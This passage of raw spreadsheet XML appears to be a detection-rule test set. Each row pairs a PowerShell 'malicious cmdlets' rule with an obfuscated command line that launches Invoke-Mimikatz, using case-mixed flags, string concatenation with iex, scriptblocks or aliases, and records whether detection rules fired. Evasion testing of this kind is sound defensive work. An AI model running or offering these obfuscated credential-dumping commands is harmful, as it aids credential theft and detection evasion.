        <v>0</v>
      </c>
      <c r="I1346" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1346" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1346" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1347" ht="15.75" customHeight="1" s="42">
      <c r="A1347" s="43" t="n"/>
      <c r="B1347" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1347" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1347" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1347" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1347" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1347" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1347" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1347" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1347" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1347" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1348" ht="15.75" customHeight="1" s="42">
      <c r="A1348" s="43" t="n"/>
      <c r="B1348" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1348" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1348" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1348" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1348" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1348" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1348" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1348" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1348" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1348" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1349" ht="15.75" customHeight="1" s="42">
      <c r="A1349" s="43" t="n"/>
      <c r="B1349" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1349" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1349" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1349" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1349" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1349" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1349" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1349" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1349" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1349" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1350" ht="15.75" customHeight="1" s="42">
      <c r="A1350" s="43" t="n"/>
      <c r="B1350" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1350" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1350" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1350" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmand "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1350" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1350" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1350" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1350" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1350" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1350" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1351" ht="15.75" customHeight="1" s="42">
      <c r="A1351" s="43" t="n"/>
      <c r="B1351" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1351" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1351" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1351" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnd "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1351" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1351" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1351" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1351" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1351" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1351" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1352" ht="15.75" customHeight="1" s="42">
      <c r="A1352" s="43" t="n"/>
      <c r="B1352" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1352" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1352" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1352" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1352" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1352" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1352" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1352" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1352" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1352" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1353" ht="15.75" customHeight="1" s="42">
      <c r="A1353" s="43" t="n"/>
      <c r="B1353" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1353" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1353" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1353" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F1353" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1353" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1353" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1353" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1353" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1353" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1354" ht="15.75" customHeight="1" s="42">
      <c r="A1354" s="43" t="n"/>
      <c r="B1354" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1354" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1354" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1354" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F1354" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1354" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1354" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1354" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1354" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1354" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1355" ht="15.75" customHeight="1" s="42">
      <c r="A1355" s="43" t="n"/>
      <c r="B1355" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1355" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1355" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1355" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F1355" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1355" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1355" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1355" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1355" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1355" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1356" ht="15.75" customHeight="1" s="42">
      <c r="A1356" s="43" t="n"/>
      <c r="B1356" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1356" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1356" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1356" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMMand "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F1356" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1356" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1356" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1356" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1356" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1356" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1357" ht="15.75" customHeight="1" s="42">
      <c r="A1357" s="43" t="n"/>
      <c r="B1357" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1357" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1357" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1357" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAND "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F1357" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1357" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1357" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1357" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1357" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1357" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1358" ht="15.75" customHeight="1" s="42">
      <c r="A1358" s="43" t="n"/>
      <c r="B1358" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1358" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1358" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1358" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1358" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1358" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1358" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I135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58" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1358" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1359" ht="15.75" customHeight="1" s="42">
      <c r="A1359" s="43" t="n"/>
      <c r="B1359" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1359" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1359" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1359" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1359" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1359" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1359" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I135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59" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1359" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1360" ht="15.75" customHeight="1" s="42">
      <c r="A1360" s="43" t="n"/>
      <c r="B1360" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1360" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1360" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1360" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1360" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1360" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1360" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I136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60" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1360" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1361" ht="15.75" customHeight="1" s="42">
      <c r="A1361" s="43" t="n"/>
      <c r="B1361" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1361" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1361" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1361" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmManD "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1361" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1361" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1361" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I136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61" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1361" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1362" ht="15.75" customHeight="1" s="42">
      <c r="A1362" s="36" t="n"/>
      <c r="B1362" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1362" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1362" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1362" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F1362" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1362" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1362" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1362" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1362" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1362" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1363" ht="15.75" customHeight="1" s="42">
      <c r="A1363" s="36" t="n"/>
      <c r="B1363" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1363" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1363" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1363" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F1363" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1363" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1363" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1363" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1363" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1363" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1364" ht="15.75" customHeight="1" s="42">
      <c r="A1364" s="36" t="n"/>
      <c r="B1364" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1364" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1364" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1364" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F1364" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1364" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1364" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1364" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1364" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1364" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1365" ht="15.75" customHeight="1" s="42">
      <c r="A1365" s="36" t="n"/>
      <c r="B1365" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1365" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1365" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1365" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMmaNd "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F1365" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1365" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1365" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1365" s="36" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1365" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1365" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1366" ht="15.75" customHeight="1" s="42">
      <c r="A1366" s="36" t="n"/>
      <c r="B1366" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1366" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1366" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1366" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F1366" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1366" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1366" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1366" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1366" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1366" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1367" ht="15.75" customHeight="1" s="42">
      <c r="A1367" s="36" t="n"/>
      <c r="B1367" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1367" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1367" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1367" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1367" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1367" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1367" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I136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67" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1367" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1368" ht="15.75" customHeight="1" s="42">
      <c r="A1368" s="36" t="n"/>
      <c r="B1368" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1368" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1368" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1368" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1368" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1368" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1368" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I136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68" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1368" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1369" ht="15.75" customHeight="1" s="42">
      <c r="A1369" s="36" t="n"/>
      <c r="B1369" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1369" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1369" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1369" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1369" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1369" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1369" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I136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69" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1369" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1370" ht="15.75" customHeight="1" s="42">
      <c r="A1370" s="36" t="n"/>
      <c r="B1370" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1370" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1370" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1370" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1370" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1370" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1370" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I137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0" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1370" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1371" ht="15.75" customHeight="1" s="42">
      <c r="A1371" s="43" t="n"/>
      <c r="B1371" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1371" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1371" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1371" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmANd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1371" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1371" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1371" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1371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1" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1371" s="36" t="b">
        <v>0</v>
      </c>
    </row>
